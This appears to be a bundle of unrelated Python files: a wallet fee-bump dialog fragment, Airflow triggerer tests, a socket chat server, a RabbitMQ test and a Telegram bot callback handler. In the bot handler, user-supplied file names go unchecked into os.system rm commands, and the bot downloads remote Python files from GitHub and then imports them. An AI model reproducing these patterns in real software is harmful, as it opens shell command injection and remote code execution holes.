vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
test_triggerer_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import asyncio
import datetime
import time
from threading import Thread
import pytest
from airflow.jobs.triggerer_job import TriggererJob, TriggerRunner
from airflow.models import DagModel, DagRun, TaskInstance, Trigger
from airflow.operators.empty import EmptyOperator
from airflow.operators.python import PythonOperator
from airflow.triggers.base import TriggerEvent
from airflow.triggers.temporal import TimeDeltaTrigger
from airflow.triggers.testing import FailureTrigger, SuccessTrigger
from airflow.utils import timezone
from airflow.utils.session import create_session
from airflow.utils.state import State, TaskInstanceState
from tests.test_utils.db import clear_db_dags, clear_db_runs
class TimeDeltaTrigger_(TimeDeltaTrigger):
def __init__(self, delta, filename):
super().__init__(delta=delta)
self.filename = filename
self.delta = delta
async def run(self):
with open(self.filename, 'at') as f:
f.write('hi\n')
async for event in super().run():
yield event
def serialize(self):
return (
"tests.jobs.test_triggerer_job.TimeDeltaTrigger_",
{"delta": self.delta, "filename": self.filename},
)
@pytest.fixture(autouse=True)
def clean_database():
"""Fixture that cleans the database before and after every test."""
clear_db_runs()
clear_db_dags()
yield # Test runs here
clear_db_dags()
clear_db_runs()
@pytest.fixture
def session():
"""Fixture that provides a SQLAlchemy session"""
with create_session() as session:
yield session
def test_is_alive():
"""Checks the heartbeat logic"""
# Current time
triggerer_job = TriggererJob(None, heartrate=10, state=State.RUNNING)
assert triggerer_job.is_alive()
# Slightly old, but still fresh
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=20)
assert triggerer_job.is_alive()
# Old enough to fail
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=31)
assert not triggerer_job.is_alive()
# Completed state should not be alive
triggerer_job.state = State.SUCCESS
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=10)
assert not triggerer_job.is_alive(), "Completed jobs even with recent heartbeat should not be alive"
def test_is_needed(session):
"""Checks the triggerer-is-needed logic"""
# No triggers, no need
triggerer_job = TriggererJob(None, heartrate=10, state=State.RUNNING)
assert triggerer_job.is_needed() is False
# Add a trigger, it's needed
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
assert triggerer_job.is_needed() is True
def test_capacity_decode():
"""
Tests that TriggererJob correctly sets capacity to a valid value passed in as a CLI arg,
handles invalid args, or sets it to a default value if no arg is passed.
"""
# Positive cases
variants = [
42,
None,
]
for input_str in variants:
job = TriggererJob(capacity=input_str)
assert job.capacity == input_str or 1000
# Negative cases
variants = [
"NAN",
0.5,
-42,
4 / 2, # Resolves to a float, in addition to being just plain weird
]
for input_str in variants:
with pytest.raises(ValueError):
TriggererJob(capacity=input_str)
def test_trigger_lifecycle(session):
"""
Checks that the triggerer will correctly see a new Trigger in the database
and send it to the trigger runner, and then delete it when it vanishes.
"""
# Use a trigger that will not fire for the lifetime of the test
# (we want to avoid it firing and deleting itself)
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to appear in the TriggerRunner's storage
for _ in range(30):
if job.runner.triggers:
assert list(job.runner.triggers.keys()) == [1]
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never created trigger")
# OK, now remove it from the DB
session.delete(trigger_orm)
session.commit()
# Re-load the triggers
job.load_triggers()
# Wait for up to 3 seconds for it to vanish from the TriggerRunner's storage
for _ in range(30):
if not job.runner.triggers:
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never deleted trigger")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_create_race_condition_18392(session, tmp_path):
"""
This verifies the resolution of race condition documented in github issue #18392.
Triggers are queued for creation by TriggerJob.load_triggers.
There was a race condition where multiple triggers would be created unnecessarily.
What happens is the runner completes the trigger and purges from the "running" list.
Then job.load_triggers is called and it looks like the trigger is not running but should,
so it queues it again.
The scenario is as follows:
1. job.load_triggers (trigger now queued)
2. runner.create_triggers (trigger now running)
3. job.handle_events (trigger still appears running so state not updated in DB)
4. runner.cleanup_finished_triggers (trigger completed at this point; trigger from "running" set)
5. job.load_triggers (trigger not running, but also not purged from DB, so it is queued again)
6. runner.create_triggers (trigger created again)
This test verifies that under this scenario only one trigger is created.
"""
path = tmp_path / 'test_trigger_bad_respawn.txt'
class TriggerRunner_(TriggerRunner):
"""We do some waiting for main thread looping"""
async def wait_for_job_method_count(self, method, count):
for _ in range(30):
await asyncio.sleep(0.1)
if getattr(self, f'{method}_count', 0) >= count:
break
else:
pytest.fail(f"did not observe count {count} in job method {method}")
async def create_triggers(self):
"""
On first run, wait for job.load_triggers to make sure they are queued
"""
if getattr(self, 'loop_count', 0) == 0:
await self.wait_for_job_method_count('load_triggers', 1)
await super().create_triggers()
self.loop_count = getattr(self, 'loop_count', 0) + 1
async def cleanup_finished_triggers(self):
"""On loop 1, make sure that job.handle_events was already called"""
if self.loop_count == 1:
await self.wait_for_job_method_count('handle_events', 1)
await super().cleanup_finished_triggers()
class TriggererJob_(TriggererJob):
"""We do some waiting for runner thread looping (and track calls in job thread)"""
def wait_for_runner_loop(self, runner_loop_count):
for _ in range(30):
time.sleep(0.1)
if getattr(self.runner, 'call_count', 0) >= runner_loop_count:
break
else:
pytest.fail("did not observe 2 loops in the runner thread")
def load_triggers(self):
"""On second run, make sure that runner has called create_triggers in its second loop"""
super().load_triggers()
self.runner.load_triggers_count = getattr(self.runner, 'load_triggers_count', 0) + 1
if self.runner.load_triggers_count == 2:
self.wait_for_runner_loop(runner_loop_count=2)
def handle_events(self):
super().handle_events()
self.runner.handle_events_count = getattr(self.runner, 'handle_events_count', 0) + 1
trigger = TimeDeltaTrigger_(delta=datetime.timedelta(microseconds=1), filename=path.as_posix())
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
dag = DagModel(dag_id='test-dag')
dag_run = DagRun(dag.dag_id, run_id='abc', run_type='none')
ti = TaskInstance(PythonOperator(task_id='dummy-task', python_callable=print), run_id=dag_run.run_id)
ti.dag_id = dag.dag_id
ti.trigger_id = 1
session.add(dag)
session.add(dag_run)
session.add(ti)
session.commit()
job = TriggererJob_()
job.runner = TriggerRunner_()
thread = Thread(target=job._execute)
thread.start()
try:
for _ in range(40):
time.sleep(0.1)
# ready to evaluate after 2 loops
if getattr(job.runner, 'loop_count', 0) >= 2:
break
else:
pytest.fail("did not observe 2 loops in the runner thread")
finally:
job.runner.stop = True
job.runner.join()
thread.join()
instances = path.read_text().splitlines()
assert len(instances) == 1
def test_trigger_from_dead_triggerer(session):
"""
Checks that the triggerer will correctly claim a Trigger that is assigned to a
triggerer that does not exist.
"""
# Use a trigger that has an invalid triggerer_id
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
trigger_orm.triggerer_id = 999 # Non-existent triggerer
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
def test_trigger_from_expired_triggerer(session):
"""
Checks that the triggerer will correctly claim a Trigger that is assigned to a
triggerer that has an expired heartbeat.
"""
# Use a trigger assigned to the expired triggerer
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
trigger_orm.triggerer_id = 42
session.add(trigger_orm)
# Use a TriggererJob with an expired heartbeat
triggerer_job_orm = TriggererJob()
triggerer_job_orm.id = 42
triggerer_job_orm.start_date = timezone.utcnow() - datetime.timedelta(hours=1)
triggerer_job_orm.end_date = None
triggerer_job_orm.latest_heartbeat = timezone.utcnow() - datetime.timedelta(hours=1)
session.add(triggerer_job_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
def test_trigger_firing(session):
"""
Checks that when a trigger fires, it correctly makes it into the
event queue.
"""
# Use a trigger that will immediately succeed
trigger = SuccessTrigger()
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to fire and appear in the event queue
for _ in range(30):
if job.runner.events:
assert list(job.runner.events) == [(1, TriggerEvent(True))]
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never sent the trigger event out")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_failing(session):
"""
Checks that when a trigger fails, it correctly makes it into the
failure queue.
"""
# Use a trigger that will immediately fail
trigger = FailureTrigger()
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to fire and appear in the event queue
for _ in range(30):
if job.runner.failed_triggers:
assert len(job.runner.failed_triggers) == 1
trigger_id, exc = list(job.runner.failed_triggers)[0]
assert trigger_id == 1
assert isinstance(exc, ValueError)
assert exc.args[0] == "Deliberate trigger failure"
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never marked the trigger as failed")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_cleanup(session):
"""
Checks that the triggerer will correctly clean up triggers that do not
have any task instances depending on them.
"""
# Use a trigger that will not fire for the lifetime of the test
# (we want to avoid it firing and deleting itself)
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Trigger the cleanup code
Trigger.clean_unused(session=session)
session.commit()
# Make sure it's gone
assert session.query(Trigger).count() == 0
def test_invalid_trigger(session, dag_maker):
"""
Checks that the triggerer will correctly fail task instances that depend on
triggers that can't even be loaded.
"""
# Create a totally invalid trigger
trigger_orm = Trigger(classpath="fake.classpath", kwargs={})
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Create the test DAG and task
with dag_maker(dag_id='test_invalid_trigger', session=session):
EmptyOperator(task_id='dummy1')
dr = dag_maker.create_dagrun()
task_instance = dr.task_instances[0]
# Make a task instance based on that and tie it to the trigger
task_instance.state = TaskInstanceState.DEFERRED
task_instance.trigger_id = 1
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in the failed queue
assert len(job.runner.failed_triggers) == 1
# Run the failed trigger handler
job.handle_failed_triggers()
# Make sure it marked the task instance as failed (which is actually the
# scheduled state with a payload to make it fail)
task_instance.refresh_from_db()
assert task_instance.state == TaskInstanceState.SCHEDULED
assert task_instance.next_method == "__fail__"
assert task_instance.next_kwargs['error'] == 'Trigger failure'
assert task_instance.next_kwargs['traceback'][-1] == "ModuleNotFoundError: No module named 'fake'\n"
|
utils.py
|
import datetime
import functools
import os
import sys
import threading
def get_dir_files(directory):
return os.listdir(directory if directory else '.')
def get_current_directory():
return os.path.dirname(os.getcwd()) + os.path.normpath('/')
def get_platform():
return sys.platform
def unix_to_date(unix_timestamp):
date = datetime.datetime.fromtimestamp(unix_timestamp)
return date.strftime('%b %d %Y %H:%M:%S')
def asynchronous(func):
@functools.wraps(func)
def asynchronous_func(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return asynchronous_func
|
nucleo.py
|
import socket
import threading
import time
ServerSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ServerSocket.bind(('testeserver123.herokuapp.com', 80))
ServerSocket.listen(50)
ClientsSocketsList = []
EnderecoList = []
Encode_mode = 'utf-8'
def transmitir(mensagem):
for EveryClient in ClientsSocketsList:
EveryClient.send(mensagem.encode(Encode_mode))
def receber_transmitir(ClientSocketParam):
while True:
try:
msg = ClientSocketParam.recv(1024).decode(Encode_mode)
transmitir(msg)
except:
index_do_end_correspondente_ao_socket_problematico = ClientsSocketsList.index(ClientSocketParam)
ClientSocketParam.close()
print(f'{EnderecoList[index_do_end_correspondente_ao_socket_problematico]} se desconectou do SERVER')
ClientsSocketsList.remove(ClientSocketParam)
EnderecoList.pop(index_do_end_correspondente_ao_socket_problematico)
'''thread_de_transmissao = threading.Thread(target = transmitir, daemon = True)
thread_de_transmissao.start()'''
while True:
ClientSocket, Endereco = ServerSocket.accept()
EnderecoList.append(Endereco)
ClientsSocketsList.append(ClientSocket)
ClientSocket.send('Voce se conectou com sucesso ao servidor!'.encode(Encode_mode))
print(f'{Endereco} se conectou ao SERVER')
threadclient = threading.Thread(target = receber_transmitir, args = (ClientSocket,), daemon = True )
threadclient.start()
|
test_completed_CompletedProducerOperator.py
|
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import time
from multiprocessing import Manager, Process
# Libs
# Custom
from synmanager.config import COMPLETED_QUEUE
from conftest import (
PROJECT_KEY, RUN_RECORD_1, RUN_RECORD_2,
enumerate_federated_conbinations
)
##################
# Configurations #
##################
#####################################
# Tests - CompletedProducerOperator #
#####################################
def test_CompletedProducerOperator_publish_message(
test_message,
completed_producer_operator
):
""" Tests if message publishing to the `Completed` queue is valid.
# C1: Check that a single message was published successfully
# C2: Check that the published message is indentical to original
"""
completed_producer_operator.connect()
completed_producer_operator.publish_message(test_message)
# C1
declared_queue = completed_producer_operator.channel.queue_declare(
COMPLETED_QUEUE,
passive=False,
durable=True
)
queue_message_count = declared_queue.method.message_count
assert queue_message_count == 1
# C2
_, _, body = completed_producer_operator.channel.basic_get(
queue=COMPLETED_QUEUE,
auto_ack=True
)
assert body.decode() == test_message
completed_producer_operator.disconnect()
def test_CompletedProducerOperator_process(
test_kwargs,
completed_producer_operator
):
""" Tests if message generation is valid. Bulk messages are generated from
a set of declared arguments and sent to the `Completed` queue.
# C1: Check that declared arguments was decomposed into correct no. of jobs
# C2: Check that published message is composed of a single job
"""
completed_producer_operator.connect()
job_combinations = enumerate_federated_conbinations(**test_kwargs)
for job_key, job_kwargs in job_combinations.items():
completed_producer_operator.process(**{
'process': 'completed', # operations filter for MQ consumer
'combination_key': job_key,
'combination_params': job_kwargs
})
# C1
declared_queue = completed_producer_operator.channel.queue_declare(
COMPLETED_QUEUE,
passive=False,
durable=True
)
queue_message_count = declared_queue.method.message_count
assert queue_message_count == 2
store = Manager().list()
def message_callback(ch, method, properties, body):
decoded_msg = body.decode()
kwargs = completed_producer_operator.parse_message(decoded_msg)
store.append(kwargs)
completed_producer_operator.channel.basic_consume(
queue=COMPLETED_QUEUE,
on_message_callback=message_callback,
auto_ack=True
)
p = Process(target=completed_producer_operator.channel.start_consuming)
p.start()
while len(store) != 2:
time.sleep(1)
assert len(store) == 2
for federated_config in store:
# C2
registered_run = federated_config['combination_params']['run']
assert registered_run in [RUN_RECORD_1, RUN_RECORD_2]
p.terminate()
p.join()
p.close()
completed_producer_operator.disconnect()
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/Pandatele/Banda-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/zx_xx")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/zx_xx")]])
